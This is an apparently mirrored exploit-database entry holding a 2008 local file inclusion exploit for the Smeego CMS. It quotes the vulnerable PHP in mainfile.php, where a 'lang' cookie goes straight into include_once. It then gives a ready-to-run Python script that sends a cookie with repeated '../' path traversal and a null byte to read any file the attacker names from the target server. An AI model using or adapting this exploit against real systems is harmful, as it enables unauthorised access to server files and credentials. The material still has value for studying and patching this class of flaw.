Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstorm0inPACKETSTORM:66479
HistoryMay 19, 2008 - 12:00 a.m.

smeego-lfi.txt

2008-05-1900:00:00
0in
packetstormsecurity.com
11
JSON
`# Smeego CMS Local File Include Exploit  
# by  
# 0in from Dark-Coders Programming & Security Group  
# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<  
#--------------------------------------------------------  
# Contact: 0in(dot)email[at]gmail(dot)com  
#--------------------------------------------------------  
# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor  
#--------------------------------------------------------  
# Description:  
# Smeego is a Content Management System or Portal  
# System written in PHP and designed to be  
# easy to install and use. Smeego has a mature code  
# and comes with cool modules and themes  
# for you to start your own dynamic and database  
# driven website. Bla bla Bla [...]  
# -------------------------------------------------------  
# Script home: http://smeego.com  
# -------------------------------------------------------  
# Vuln:  
# >>>>>> File: mainfile.php <<<<<<<  
#if ($display_errors == 1) { // We don't se any errors ;(  
# @ini_set('display_errors', 1);  
#} else {  
# @ini_set('display_errors', 0);  
#}  
#  
#if (isset($newlang)) {  
#  
# if (file_exists("language/lang-".$newlang.".php")) {  
# setcookie("lang",$newlang,time()+31536000);  
# include_once("language/lang-".$newlang.".php");  
# $currentlang = $newlang;  
# } else {  
# setcookie("lang",$language,time()+31536000);  
# include_once("language/lang-".$language.".php");  
# $currentlang = $language;  
# }  
#} elseif (isset($lang)) {  
#  
# include_once("language/lang-".$lang.".php");  
# $currentlang = $lang;  
#} else {  
# setcookie("lang",$language,time()+31536000);  
# include_once("language/lang-".$language.".php");  
# $currentlang = $language;  
#}  
# >>>>>> End <<<<<<<  
# So.. We can send Cookie: lang=[lfi]  
  
# -------------------------------------------------------  
  
# Simple Python Exploit:  
  
#!/usr/bin/python  
import sys  
import time  
import httplib  
print '====================================================='  
print ' Smeego CMS Local File INclude Exploit '  
print ' by '  
print ' 0in from Dark-Coders Programming & Security Group! '  
print ' http://dark-coders.4rh.eu '  
print '====================================================='  
try:  
target=sys.argv[1]  
path=sys.argv[2]  
file=sys.argv[3]  
except Exception:  
print '\nUse: %s [target] [path] [file]' % sys.argv[0]  
quit()  
i=0  
lfi='../'  
target+=":80"  
special="%00"  
file+=special  
for i in range(9):  
lfi+="../"  
print '---------------------------------------------------------'  
mysock=httplib.HTTPConnection(target)  
mysock=httplib.HTTPConnection(target)  
mysock.putrequest("GET",path)  
mysock.putheader("User-Agent","Billy Explorer v666")  
mysock.putheader('Accept', 'text/html')  
mysock.putheader('Accept-Language',' en-us,en;q=0.5')  
mysock.putheader('Cookie','lang=%s%s' % (lfi,file))  
mysock.endheaders()  
reply=mysock.getresponse()  
print reply.read()  
time.sleep(2)  
mysock.close()  
print '----------------------------------------------------------'  
  
#EOFF  
`
JSON